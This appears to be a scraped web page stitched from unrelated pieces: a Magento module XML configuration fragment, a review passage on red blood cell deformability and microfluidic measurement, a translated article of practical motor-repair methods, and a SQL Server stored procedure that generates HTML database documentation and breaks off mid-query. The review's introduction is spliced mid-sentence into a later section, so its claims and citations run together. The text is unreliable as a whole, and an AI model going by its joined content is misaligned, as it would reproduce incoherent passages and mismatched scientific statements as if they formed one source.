<class>[Namespace]_[Module]_Model_Mysql4</class> <entities> <[module]> <table>[module]</table> </[module]> </entities> </[module]_mysql4> </models> <resources> <[module]_setup> <setup> <module>[Namespace]_[Module]</module> </setup> <connection> <use>core_setup</use> </connection> </[module]_setup> <[module]_write> <connection> <use>core_write</use> </connection> </[module]_write> <[module]_read> <connection> <use>core_read</use> </connection> </[module]_read> </resources> <blocks> <[module]> <class>[Namespace]_[Module]_Block</class> </[module]> </blocks> <helpers> <[module]> <class>[Namespace]_[Module]_Helper</class> </[module]> </helpers> </global> </config> XML Layout /app/design/adminhtml/<interface>/<theme>/layout/<module>.xml <?xml version=“1.0”?> <layout version=“0.1.0”> <[module]_adminhtml_[module]_index> <reference name=“content”> <block type=“[module]/adminhtml_[module]” name=“[module]” /> </reference> </[module]_adminhtml_[module]_index> </layout> You may like these posts
Red blood cells (RBCs) possess a unique capacity for undergoing cellular deformation to navigate across various human microcirculation vessels, enabling them to pass through capillaries that are smaller than their diameter and to carry out their role as gas carriers between blood and tissues. Alterations of the RBC membrane have been associated with pathological conditions such as hereditary disorders (e.g., spherocytosis, elliptocytosis, ovalocytosis, and stomatocytosis), metabolic disorders (e.g., diabetes, hypercholesterolemia, obesity), adenosine triphosphate-induced membrane changes, oxidative stress, and paroxysmal nocturnal hemoglobinuria. Microfluidic techniques have been identified as the key to developing state-of-the-art dynamic experimental models for elucidating the significance of RBC membrane alterations in pathological conditions and the role that such alterations play in microvasculature flow dynamics.

I. INTRODUCTION

Red blood cells (RBCs) possess a unique capacity for undergoing cellular deformation to navigate across various human microcirculation vessels, enabling them to pass through capillaries that are smaller than their diameter and to carry out their role as gas carriers between blood and tissues.1–4 Pathological alterations in RBC deformability have been associated with various diseases5 such as malaria,6,7 sickle cell anemia,8 diabetes,9 hereditary disorders,10 myocardial infarction,11 and paroxysmal nocturnal hemoglobinuria (PNH).12 Because of its pathophysiological importance, measurement of RBC deformability has been the focus of numerous studies over the past decades.2,13–15 Several comprehensive reviews have been published related to this issue,2,16–18 and the most recent have focused on the characterization of biomechanical properties of pathological RBCs, particularly involving sickle cell disease and was observed in experiments as well,66,79–84 estimations of cell membrane viscoelastic properties such as the RBC shear elastic modulus and surface viscosity by using diverging channels,65 measurements of the RBC time recovery constant in start-up experiments,35 cell characterization by electric impedance microflow cytometry,85 and single-cell microchamber array (SiCMA) technology86,87 (Figures 3(D1) and 3(D2)). The latter applies a dielectrophoretic force to deform RBCs and uses image analysis to track the RBC shape changes, allowing the evaluation of the deformability of single RBCs in terms of the Elongation Index (%), defined as (x − y)/(x + y) × 100, where x and y are the RBC major and minor axes, respectively. Dielectrophoretic force has also been used for the real-time separation of blood cells from droplets of whole blood.88 Recently, RBC geometrical parameters such as RBC volume, surface area, and distribution width (RDW), which are a measurement of the size variation as well as an index of heterogeneity that can be used as a significant diagnostic and prognostic tool in cardiovascular and thrombotic disorders,90 have been measured in microcapillary flow using high-speed microscopy.81,91,92 The use of different techniques leads to various measured values, meaning that the measured deformation of RBCs depends strongly on the deformation protocol.
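As a quick worked example of the Elongation Index defined above (the axis values here are illustrative only, not taken from the cited studies): a cell imaged with a major axis of x = 10.2 μm and a minor axis of y = 5.4 μm gives EI = (10.2 − 5.4)/(10.2 + 5.4) × 100 ≈ 30.8%, while an undeformed, circular outline with x = y gives EI = 0%.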
This dependence of the measured values on the deformation protocol has been widely discussed in recent papers, which state that the mechanical response of RBCs is not linear.93,94 The wide discrepancies resulting from the use of different techniques can be observed in the large standard deviation of the values presented in Table I, where the average values of the geometric and mechanical properties of healthy RBCs reported in the literature are listed together with their related experimental techniques.

TABLE I. Geometric and mechanical properties of RBCs.

In order to identify which technique has been used to measure each RBC biomechanical property, eight categories are reported in Figure 4: micropipette, flickering, viscometry, microcapillary flow/microfluidics, ektacytometry, AFM, optical tweezers, and other, where the category "other" includes reflection interference contrast micrography, microscopic holography, hanging cells, flow channel, magnetic field, laminar flow system, and optical interferometric techniques. Data from both healthy and pathological RBCs (hereditary membrane disorders, metabolic disorders and ATP-induced membrane changes, oxidative stress, PNH, malaria, and sickle cell anemia) have been considered in producing Figure 4.

FIG. 4. Techniques used to measure a specific RBC biomechanical property.

IV. HEREDITARY MEMBRANE DISORDERS

Hereditary disorders involving the erythrocyte membrane include spherocytosis (HS), elliptocytosis (HE), ovalocytosis, and stomatocytosis (HSt). These syndromes are caused by a deficiency or dysfunction of one of the membrane proteins.
Several practical methods in motor repair (Part Two)
26/10/2019

5. Repairing the motor after the "hood" burns through

After a wound-rotor motor suffers a short circuit at the headgear (end binding), the wire end is usually burned over a certain length, and a matching length of wire can be spliced in for the repair. The specific method is as follows: use one or two 250 W infrared bulbs to locally soften the rotor end so that it can be freed, remove the copper residue, and then bend the burnt (flattened) copper wire end slightly to prepare it for soldering. The splice wire can be silver-soldered or soft-soldered. Take care to protect the windings during welding to avoid burning them (shield them with wet asbestos cloth or rope). Flatten the weld after welding. After straightening the copper wire, wrap it with a layer of glass ribbon, apply insulating varnish, and dry it with an infrared bulb. When the wire is placed back in its original position, a thin sheet of green insulating paper is placed underneath, the excess portion of the copper wire is cut off, and the sleeve is fitted and soldered. Finally, paint the repaired area and let it dry. The copper sleeve is fitted to the hood and made to the original size; before it is made, the copper piece should be tinned. Motors with this headgear construction have a large capacity and are difficult to disassemble and reassemble, so the above method is well suited to on-site repair.

6. Removing the old windings of a motor

Generally, the old windings must be baked to soften them before the wires are removed. However, for larger-capacity motors it is difficult to soften and pull out the wires, so the old windings can instead be removed as follows: use a flat chisel to cut off one end of the winding flush with the slot openings. The other end of the winding is cut with metal shears, and the enameled wire in each slot is then punched out with a suitably sized copper rod, after which the slot is cleaned. If the copper rod is the right size and the operation is carried out correctly, the wires in each slot can be punched out together. When using the flat chisel, be careful not to damage the stator core. When the windings are removed by this method, the drying step before removal can be omitted, which saves time and electric energy, and the work is relatively labor-saving. However, this method is suitable for motors with a capacity of 7.5 kW or less; the casing of a small motor or micromotor is too small for a flat chisel to be used conveniently.

7. Grinding in new brushes

For a DC motor or another motor with a commutator, when the brush holder is perpendicular to the surface of the commutator, the method of grinding in a new brush is to lay a piece of sandpaper on the surface of the commutator and hold a new brush of the same type against it. The brush is moved back and forth along the commutator, and the friction quickly grinds its face to an arc that matches the commutator surface. Use coarser sandpaper first, then fine sandpaper. When grinding, hold the brush upright and move it back and forth along the axis of the commutator without tilting it, and do not make the reciprocating stroke too long. Take care to prevent brush powder from entering the armature and the commutator grooves. After grinding, put the brush into the brush holder. After starting the motor and letting it run for a few minutes, take out each brush and check that the contact surface accounts for more than 80% of the total area; otherwise, re-grind it until it is acceptable.

When the brush holder of the motor is not perpendicular to the surface of the commutator, the following method should be adopted: lay the sandpaper on a flat surface and grind a bevel on the brush by hand according to the inclination angle of the brush holder. Then put the brush into the brush holder and turn the motor rotor by hand, so that a bright contact spot appears on the beveled face of the brush; polish this spot away with sandpaper (it can also be scraped with a knife). Put the brush back into the holder and turn the rotor by hand again; a contact spot will be polished out once more, this time with a larger area than the first. After repeating this several times, the contact surface of the brush becomes larger and larger and gradually forms an arc. When polishing away the bright spots, do not remove too much material each time; in particular, toward the end, be careful and just rub lightly with fine sandpaper. If you remove too much, the contact surface will become smaller. Practice has shown that grinding in an inclined brush this way is fast and gives good results.

8. Emergency repair of a worn rotor journal or end-cap bearing seat

The specific method and steps are as follows:

1. Wash the worn area repeatedly with ethanol or gasoline.

2. Heat a ternary nylon-ethanol solution until it becomes a transparent liquid, and apply it thinly to the worn portion with a small brush. For a slightly larger amount of wear, the heating time may be extended to make the solution thicker before coating. Several coats are generally needed to reach the required thickness. After the first coat, let it stand for about 3 minutes so that it dries by itself; when it is no longer sticky, the second coat can be applied.

3. After coating, the part can be dried with heat (at a temperature not exceeding 80 °C, for 0.5 to 1 hour) or allowed to dry naturally (at a room temperature of about 20 °C, in a ventilated place, for about 36 hours).

4. If the wear is less than 0.10 mm, the part can be used after drying. If the wear is greater than 0.10 mm, then in order to ensure the concentricity of the stator and rotor when the motor is assembled, the coated surface must be turned. During turning (provided the original bearing outer-ring and inner-ring dimensions are within tolerance), a repaired end-cap bearing seat can be machined to the P6 fit, and a repaired journal can be machined to the r6 fit. After the applied nylon solution has completely dried, it has sufficient adhesion and hardness to fully meet the requirements of motor assembly. This method is only suitable for cases where the amount of wear is not large, no more than a few tenths of a millimeter.
CREATE Procedure sp_dbDocumentation AS BEGIN SET NOCOUNT ON --############################################################################# --this script produces formatted HTML documentation about the database and all its objects -- Execute in SSMS -- Be sure to "use " or make sure of your current database context before running. -- Save As .html --############################################################################# -- USAGE: exec sp_dbDocumentation --############################################################################# -- this script is an enhancement to a contribution found here: -- http://www.sqlservercentral.com/scripts/Miscellaneous/31005/ -- enhancement by Lowell Izaguirre scripts*at*stormrage.com. -- http://www.stormrage.com/SQLStuff/sp_dbDocumentation.txt -- You can use this however you like...this script is not rocket science, but it took a bit of work to create. -- the only thing that I ask -- is that if you adapt my procedure or make it better, to simply send me a copy of it, -- so I can learn from the things you've enhanced.The feedback you give will be what makes -- it worthwhile to me, and will be fed back to the SQL community. -- add this to your toolbox of helpful scripts. --############################################################################# -- important! note that this script has a dependancy to sp_GetDDL !!!!!! -- http://www.stormrage.com/SQLStuff/sp_GetDDL_Latest.txt --############################################################################# -- if you are going to put this in MASTER, and want it to be able to query -- each database's sys.indexes, you MUST mark it as a system procedure: -- both procs are required! -- EXECUTE sp_ms_marksystemobject 'sp_GetDDL' -- EXECUTE sp_ms_marksystemobject 'sp_dbDocumentation' --############################################################################# CREATE TABLE #Results(ResultsID int identity(1,1),ResultsText varchar(max) ) DECLARE @table_id int DECLARE @TableName varchar(300) DECLARE @QuotedTableName varchar(300) DECLARE @strHTML varchar(8000) DECLARE @strHTML1 varchar(8000) DECLARE @ColumnName varchar(200) DECLARE @ColumnType varchar(200) DECLARE @ColumnLength smallint DECLARE @ColumnComments sql_variant DECLARE @ColumnPrec smallint DECLARE @ColumnScale int DECLARE @ColumnCollation varchar(200) DECLARE @CType sysname DECLARE @CName sysname DECLARE @CPKTable sysname DECLARE @CPKColumn sysname DECLARE @CFKTable sysname DECLARE @CFKColumn sysname DECLARE @CKey smallint DECLARE @CDefault varchar(4000) DECLARE @Populated bit DECLARE @IDesc varchar(60) DECLARE @IRows varchar(11) DECLARE @IReserved varchar(11) DECLARE @IData varchar(11) DECLARE @IIndex varchar(11) DECLARE @IRowData varchar(11) DECLARE @SetOption bit DECLARE @databasename varchar(30) DECLARE @orderCol varchar(30) DECLARE @numeric bit DECLARE @Trigger varchar(50) DECLARE @DBPath varchar(500) DECLARE @ViewName varchar(200) DECLARE @ViewTableDep varchar(200) DECLARE @ViewColDep varchar(200) DECLARE @ViewColDepType varchar(200) DECLARE @ViewColDepLength smallint DECLARE @ViewColDepPrec smallint DECLARE @ViewColDepScale int DECLARE @ViewColDepCollation varchar(200) DECLARE @SPName varchar(200) DECLARE @SPTableDep varchar(200) DECLARE @SPColDep varchar(200) DECLARE @SPColDepType varchar(200) DECLARE @SPColDepLength smallint DECLARE @SPColDepPrec smallint DECLARE @SPColDepScale int DECLARE @SPColDepCollation varchar(200) DECLARE @ParamName sysname DECLARE @ParamDataType varchar(50) DECLARE @ParamType varchar(11) DECLARE @DBLastBackup 
smalldatetime DECLARE @DBLastBackupDays int DECLARE @UserLogin varchar(30) DECLARE @UserName varchar(30) DECLARE @UserGroup varchar(30) declare @results table(results varchar(max) ) --initialize HTML string SET @strHTML = '' SELECT @strHTML = @strHTML + '' + db_Name() + ' Database Definition ' insert into #Results (ResultsText) SELECT @strHTML SELECT @DBPath = (SELECT [filename] FROM master..sysdatabases WHERE [name] = db_Name()) SELECT @strHTML = ' ' + db_name() + ' Database Definition ' insert into #Results (ResultsText) SELECT @strHTML insert into #Results (ResultsText) SELECT ' SERVER SETTINGS | DATABASE SETTINGS | USERS | TABLES | VIEWS | STORED PROCEDURES | FUNCTIONS ' --############################################################################# --Table Of Contents --############################################################################# SET NOCOUNT ON SELECT @orderCol = 'Description' SELECT @DatabaseName = db_name() SELECT @numeric = 1 IF @DatabaseName <> 'Master' AND NOT EXISTS (SELECT 1 FROM master..sysdatabases WHERE name = @DatabaseName AND (status & 4) = 4) BEGIN EXEC sp_dboption @databaseName ,'SELECT into/bulkcopy', 'true' SELECT @SetOption = 1 END IF EXISTS (SELECT 1 FROM master.sys.objects WHERE name = 'space1') DROP TABLE master..space1 CREATE TABLE master..Space1 (name varchar(60), rows varchar(11), reserved varchar(11), data varchar(11), index_size varchar(11), unused varchar(11)) DECLARE @Cmd varchar(255) DECLARE cSpace CURSOR FOR SELECT 'USE ' + @DatabaseName + ' INSERT into master..space1 EXEC sp_spaceUsed ''[' + u.name + '].[' + o.name + ']''' FROM sysobjects o JOIN sysusers u on u.uid = o.uid WHERE type = 'U' AND o.name <> 'Space1' OPEN cSPACE FETCH cSpace INTO @Cmd WHILE @@FETCH_STATUS =0 BEGIN -- PRINT @Cmd EXECUTE (@Cmd) FETCH cSpace INTO @Cmd END DEALLOCATE cSPace DECLARE cursor_index CURSOR FOR SELECT Description,Rows,Reserved,Data,Index_size,dataPerRows FROM ( SELECT 3 DataOrder, CONVERT(int,CASE @OrderCol WHEN 'Rows' THEN Rows WHEN 'Reserved' THEN SUBSTRING(Reserved, 1,LEN(Reserved)-2) WHEN 'data' THEN SUBSTRING(Data, 1,LEN(Data)-2) WHEN 'index_size' THEN SUBSTRING(Index_size, 1,LEN(index_Size)-2) WHEN 'unused' THEN SUBSTRING(unused, 1,LEN(unused)-2) END) OrderData, name Description, rows, CASE @NUMERIC WHEN 0 THEN reserved ELSE SUBSTRING(reserved, 1, len(reserved)-2) END reserved, CASE @NUMERIC WHEN 0 THEN data ELSE SUBSTRING(data, 1, len(data)-2) END data, CASE @NUMERIC WHEN 0 THEN index_size ELSE SUBSTRING(index_size, 1, len(index_size)-2) END index_size, CASE WHEN Rows = 0 THEN '0' ELSE CONVERT(varchar(11),CONVERT(numeric(10,2),CONVERT(numeric,SUBSTRING(reserved, 1, len(reserved)-2)) /rows*1000)) END DataPerRows FROM master..Space1 ) Stuff ORDER BY DataOrder, OrderData desc, description OPEN cursor_index SET @strHTML = ' ' insert into #Results (ResultsText) SELECT @strHTML insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' FETCH NEXT FROM cursor_index INTO @IDesc,@IRows,@IReserved,@IData,@IIndex,@IRowData WHILE (@@FETCH_STATUS = 0) BEGIN SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_index INTO @IDesc,@IRows,@IReserved,@IData,@IIndex,@IRowData END CLOSE cursor_index DEALLOCATE cursor_index DECLARE cursor_views_index CURSOR FOR SELECT [name] FROM sysobjects WHERE [xtype] = 'V' AND [category] <> 2 ORDER BY [name] OPEN cursor_views_index FETCH NEXT FROM cursor_views_index INTO @ViewName WHILE (@@FETCH_STATUS = 0) BEGIN SET 
@strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_views_index INTO @ViewName END CLOSE cursor_views_index DEALLOCATE cursor_views_index DECLARE cursor_sp_index CURSOR FOR SELECT [name] FROM sysobjects WHERE [xtype] = 'P' AND [category] <> 2 ORDER BY [name] OPEN cursor_sp_index FETCH NEXT FROM cursor_sp_index INTO @SPName WHILE (@@FETCH_STATUS = 0) BEGIN SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_sp_index INTO @SPName END CLOSE cursor_sp_index DEALLOCATE cursor_sp_index SELECT @strHTML = ' Table Of Contents   Table   Row Count   Reserved   Row Data   Index Size   Table Data   Server Options     Database Options     Database Users     ' + ISNULL(@IDesc, ' ') + '  ' + ISNULL(@IRows, ' ') + '  ' + ISNULL(@IReserved, ' ') + '  ' + ISNULL(@IData, ' ') + '  ' + ISNULL(@IIndex, ' ') + '  ' + ISNULL(@IRowData, ' ') + '   ' + ISNULL(@ViewName, ' ') + '     ' + ISNULL(@SPName, ' ') + '     ' insert into #Results (ResultsText) SELECT @strHTML EXECUTE ('DROP TABLE master..space1') IF @SetOption = 1 EXEC sp_dboption @databasename ,'SELECT into/bulkcopy', 'false' insert into #Results (ResultsText) SELECT ' ' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT ' Server Settings   Table  Row Count   Server name  ' + convert(varchar(30),@@SERVERNAME) + '   Instance  ' + convert(varchar(30),@@SERVICENAME) + '   Current Date Time  ' + convert(varchar(30),getdate(),113) + '   User  ' + USER_NAME() + '   Number of connections  ' + convert(varchar(30),@@connections) + '   Language  ' + convert(varchar(30),@@language) + '   Language Id  ' + convert(varchar(30),@@langid) + '   Lock Timeout  ' + convert(varchar(30),@@LOCK_TIMEOUT) + '   Maximum of connections  ' + convert(varchar(30),@@MAX_CONNECTIONS) + '   CPU Busy  ' + convert(varchar(30),@@CPU_BUSY/1000) + '   CPU Idle  ' + convert(varchar(30),@@IDLE/1000) + '   IO Busy  ' + convert(varchar(30),@@IO_BUSY/1000) + '   Packets received  ' + convert(varchar(30),@@PACK_RECEIVED) + '   Packets sent  ' + convert(varchar(30),@@PACK_SENT) + '   Packets w errors  ' + convert(varchar(30),@@PACKET_ERRORS) + '   TimeTicks  ' + convert(varchar(30),@@TIMETICKS) + '   IO Errors  ' + convert(varchar(30),@@TOTAL_ERRORS) + '   Total Read  ' + convert(varchar(30),@@TOTAL_READ) + '   Total Write  ' + convert(varchar(30),@@TOTAL_WRITE) + '   Back To Top ^ ' SET @strHTML = ' ' insert into #Results (ResultsText) SELECT @strHTML SELECT @strHTML = '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' FROM 
master..sysdatabases WHERE [name] = db_Name() GROUP BY [name] insert into #Results (ResultsText) SELECT @strHTML SELECT @DBPath = (SELECT [filename] FROM master..sysdatabases WHERE [name] = db_Name()) insert into #Results (ResultsText) SELECT '' SELECT @DBLastBackup = (SELECT CONVERT( SmallDateTime , MAX(Backup_Finish_Date)) FROM MSDB.dbo.BackupSet WHERE Type = 'd' AND Database_Name = db_Name()) insert into #Results (ResultsText) SELECT '' SELECT @DBLastBackupDays = (SELECT DATEDIFF(d, MAX(Backup_Finish_Date), Getdate()) FROM MSDB.dbo.BackupSet WHERE Type = 'd' AND Database_Name = db_Name()) insert into #Results (ResultsText) SELECT '' SET @strHTML = ' Database Settings   Option   Setting   name  ' + [name] + '   autoclose  ' + MIN(CASE status & 1 WHEN 1 THEN 'True' ELSE 'False' END) + '   SELECT into/bulkcopy  ' + MIN(CASE status & 4 WHEN 4 THEN 'True' ELSE 'False' END) + '   trunc. log on chkpt  ' + MIN(CASE status & 8 WHEN 8 THEN 'True' ELSE 'False' END) + '   torn page detection  ' + MIN(CASE status & 16 WHEN 16 THEN 'True' ELSE 'False' END) + '   loading  ' + MIN(CASE status & 32 WHEN 32 THEN 'True' ELSE 'False' END) + '   pre recovery  ' + MIN(CASE status & 64 WHEN 64 THEN 'True' ELSE 'False' END) + '   recovering  ' + MIN(CASE status & 128 WHEN 128 THEN 'True' ELSE 'False' END) + '   Falset recovered  ' + MIN(CASE status & 256 WHEN 256 THEN 'True' ELSE 'False' END) + '   offline  ' + MIN(CASE status & 512 WHEN 512 THEN 'True' ELSE 'False' END) + '   read only  ' + MIN(CASE status & 1024 WHEN 1024 THEN 'True' ELSE 'False' END) + '   dbo use only  ' + min(CASE status & 2048 WHEN 2048 THEN 'True' ELSE 'False' END) + '   single user  ' + MIN(CASE status & 4096 WHEN 4096 THEN 'True' ELSE 'False' END) + '   emergency mode  ' + MIN(CASE status & 32768 WHEN 32768 THEN 'True' ELSE 'False' END) + '   autoshrink  ' + MIN(CASE status & 4194304 WHEN 4194304 THEN 'True' ELSE 'False' END) + '   cleanly shutdown  ' + MIN(CASE status & 1073741824 WHEN 1073741824 THEN 'True' ELSE 'False' END) + '   ANSI null default  ' + MIN(CASE status2 & 16384 WHEN 16384 THEN 'True' ELSE 'False' END) + '   concat null yields null  ' + MIN(CASE status2 & 65536 WHEN 65536 THEN 'True' ELSE 'False' END) + '   recursive triggers  ' + MIN(CASE status2 & 131072 WHEN 131072 THEN 'True' ELSE 'False' END) + '   default to local cursor  ' + MIN(CASE status2 & 1048576 WHEN 1048576 THEN 'True' ELSE 'False' END) + '   quoted identifier  ' + MIN(CASE status2 & 8388608 WHEN 8388608 THEN 'True' ELSE 'False' END) + '   cursor close on commit  ' + MIN(CASE status2 & 33554432 WHEN 33554432 THEN 'True' ELSE 'False' END) + '   ANSI nulls  ' + MIN(CASE status2 & 67108864 WHEN 67108864 THEN 'True' ELSE 'False' END) + '   ANSI warnings  ' + MIN(CASE status2 & 268435456 WHEN 268435456 THEN 'True' ELSE 'False' END) + '   full text enabled  ' + MIN(CASE status2 & 536870912 WHEN 536870912 THEN 'True' ELSE 'False' END) + '   Data Path  ' + @DBPath + '   Last Backup  ' + ISNULL(CONVERT(varchar(50),@DBLastBackup),' ') + '   Days Since Last Backup  ' + ISNULL(CONVERT(varchar(10),@DBLastBackupDays),' ') + '   Back To Top ^ ' insert into #Results (ResultsText) SELECT @strHTML --############################################################################# --users --############################################################################# DECLARE cursor_users CURSOR FOR SELECT LEFT(rtrim(CASE u1.islogin WHEN 1 THEN u1.name END), 30), LEFT(rtrim(u1.name), 30), LEFT(rtrim(u2.name), 30) FROM sysusers u1, sysusers u2 WHERE u1.gid = u2.uid AND u1.sid 
IS NOT NULL AND u1.name NOT IN ('guest', 'dbo', 'Administrator') OPEN cursor_users SET @strHTML = ' ' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_users INTO @UserLogin,@UserName,@UserGroup WHILE (@@FETCH_STATUS = 0) BEGIN SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_users INTO @UserLogin,@UserName,@UserGroup END CLOSE cursor_users DEALLOCATE cursor_users SELECT @strHTML = ' Users   Login name   User name   Group name   ' + ISNULL(@UserLogin, ' ') + '  ' + ISNULL(@UserName, ' ') + '  ' + ISNULL(@UserGroup, ' ') + '   Back To Top ^ ' insert into #Results (ResultsText) SELECT @strHTML --############################################################################# --tables --############################################################################# SELECT @strHTML = ' Tables ' insert into #Results (ResultsText) SELECT @strHTML if not exists(SELECT [name] FROM sysobjects WHERE [xtype] = 'U' AND [category] <> 2) insert into #Results (ResultsText) SELECT ' No Tables Exist in ' + db_name() + ' ' DECLARE cursor_documentation CURSOR FOR SELECT DISTINCT id , [name] FROM sysobjects WHERE OBJECTPROPERTY(sysobjects.id, 'IsMSShipped') = 0 AND sysobjects.type = 'U' ORDER BY sysobjects.[name] OPEN cursor_documentation FETCH NEXT FROM cursor_documentation INTO @table_id, @TableName WHILE (@@FETCH_STATUS = 0) BEGIN SET @QuotedTableName = quotename(@TableName) --building HTML tables documentation SELECT @strHTML = '' FROM sysobjects WHERE sysobjects.id = @table_id insert into #Results (ResultsText) SELECT @strHTML SET @strHTML = '' DECLARE cursor_Column CURSOR FOR SELECT DISTINCT syscolumns.colorder, syscolumns.[name], (SELECT top 1 systypes.[name] FROM systypes WHERE xtype = syscolumns.xtype), syscolumns.length, sysproperties.COLUMN_DESCRIPTION AS [value], syscolumns.prec, syscolumns.scale, syscolumns.[collation] FROM sysobjects INNER JOIN syscolumns ON sysobjects.id = syscolumns.id INNER JOIN systypes ON syscolumns.xtype = systypes.xtype LEFT OUTER JOIN (SELECT DISTINCT OBJECT_NAME(c.object_id) AS TABLE_NAME, c.object_ID AS ID, COALESCE(ex.minor_id,0) as SMALLID, c.name AS COLUMN_NAME, systypes.Name AS DATA_TYPE, c.max_length as CHARACTER_MAXIMUM_LENGTH, ex.name + ':' + CONVERT(VARCHAR(8000),ex.value) AS COLUMN_DESCRIPTION, syscomments.text as COLUMN_DEFAULT, c.is_nullable as IS_NULLABLE FROM sys.columns c INNER JOIN systypes ON c.system_type_id = systypes.xtype LEFT JOIN syscomments ON c.default_object_id = syscomments.id LEFT OUTER JOIN sys.extended_properties ex ON ex.major_id = c.object_id AND ex.minor_id = c.column_id --AND ex.name = 'MS_Description' ALL descriptions! 
WHERE OBJECTPROPERTY(c.object_id, 'IsMsShipped')=0 )sysproperties ON syscolumns.colid = sysproperties.smallid AND syscolumns.id = sysproperties.id WHERE sysobjects.id = @table_id ORDER BY syscolumns.colorder OPEN cursor_Column DECLARE @colid int FETCH NEXT FROM cursor_Column INTO @colid,@ColumnName, @ColumnType, @ColumnLength, @ColumnComments, @ColumnPrec, @ColumnScale, @ColumnCollation WHILE (@@FETCH_STATUS = 0) BEGIN SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_Column INTO @colid,@ColumnName, @ColumnType, @ColumnLength, @ColumnComments, @ColumnPrec, @ColumnScale, @ColumnCollation END CLOSE cursor_Column DEALLOCATE cursor_Column --newly added table DDL definition DELETE FROM @results insert into @results exec sp_getddl @QuotedTableName SELECT @strHTML = '' FROM @results insert into #Results (ResultsText) SELECT @strHTML SELECT @strHTML = ' ' + sysobjects.name + '   Column   Type   Length   Precision   Scale   Collation   Comments   ' + @ColumnName + '  ' + ISNULL(@ColumnType, ' ') + '  ' + ISNULL(convert(varchar(5), @ColumnLength), ' ') + '  ' + ISNULL(convert(varchar(5), @ColumnPrec), ' ') + '  ' + ISNULL(convert(varchar(5), @ColumnScale), ' ') + '  ' + ISNULL(@ColumnCollation, ' ') + '  ' + ISNULL(convert(varchar(500), @ColumnComments), ' ') + '   ' + REPLACE(REPLACE(results,CHAR(32),' ' ),CHAR(13) , ' ' + CHAR(13)) + '   ' insert into #Results (ResultsText) SELECT @strHTML SELECT @strHTML1 = '' insert into #Results (ResultsText) SELECT @strHTML1 SELECT @strHTML1 = '' FROM sysobjects WHERE sysobjects.id = @table_id SET @Populated = 0 SET @strHTML = '' DECLARE cursor_Constraint CURSOR FOR (SELECT CASE o1.xtype WHEN 'C' THEN 'Check' WHEN 'D' THEN 'Default' WHEN 'F' THEN 'Foreign Key' WHEN 'PK' THEN 'Primary Key' WHEN 'UQ' THEN 'Unique' ELSE 'Other' END AS 'Constraint Type', o1.name AS 'Constraint name', o.name AS 'Table name', c1.name AS 'Column name', NULL AS 'FK Table name', NULL AS 'FK Column name', k.keyno AS 'KeyNo', NULL AS 'Default/Check Value' FROM sysobjects o JOIN sysobjects o1 ON o1.Parent_obj = o.id JOIN sysconstraints c ON c.constid = o1.id JOIN sysindexes i ON i.id = o.id AND i.name = o1.name JOIN sysindexkeys k ON k.id = i.id AND k.indid = i.indid JOIN syscolumns c1 ON c1.id = k.id AND c1.colid = k.colid WHERE o1.xtype = 'UQ' AND o.id = @table_id UNION SELECT CASE o1.xtype WHEN 'C' THEN 'Check' WHEN 'D' THEN 'Default' WHEN 'F' THEN 'Foreign Key' WHEN 'PK' THEN 'Primary Key' WHEN 'UQ' THEN 'Unique' ELSE 'Other' END AS 'Constraint Type', o1.name AS 'Constraint name', o.name AS 'Table name', c1.name AS 'Column name', NULL AS 'FK Table name', NULL AS 'FK Column name', NULL AS 'KeyNo', c.text AS 'Default/Check Value' FROM sysobjects o JOIN sysobjects o1 ON o1.Parent_obj = o.id JOIN syscolumns c1 ON c1.id = o1.parent_obj AND c1.colid = o1.info JOIN syscomments c ON o1.id = c.id WHERE o1.xtype In ('C' , 'D') AND o.id = @table_id UNION SELECT CASE o1.xtype WHEN 'C' THEN 'Check' WHEN 'D' THEN 'Default' WHEN 'F' THEN 'Foreign Key' WHEN 'PK' THEN 'Primary Key' WHEN 'UQ' THEN 'Unique' ELSE 'Other' END AS 'Constraint Type', o1.name AS 'Constraint name', o.name AS 'FK Table name', c1.name AS 'FK Column name', o2.name AS 'Table Table', c2.name AS 'Column name', fk.keyno AS 'KeyNo', NULL AS 'Default/Check Value' FROM sysobjects o JOIN sysobjects o1 ON o1.Parent_obj = o.id JOIN sysforeignkeys fk ON fk.constid = o1.id JOIN sysobjects o2 ON o2.id = fk.rkeyid LEFT JOIN syscolumns c1 ON c1.id = fk.fkeyid AND c1.colid = fk.fkey LEFT JOIN syscolumns 
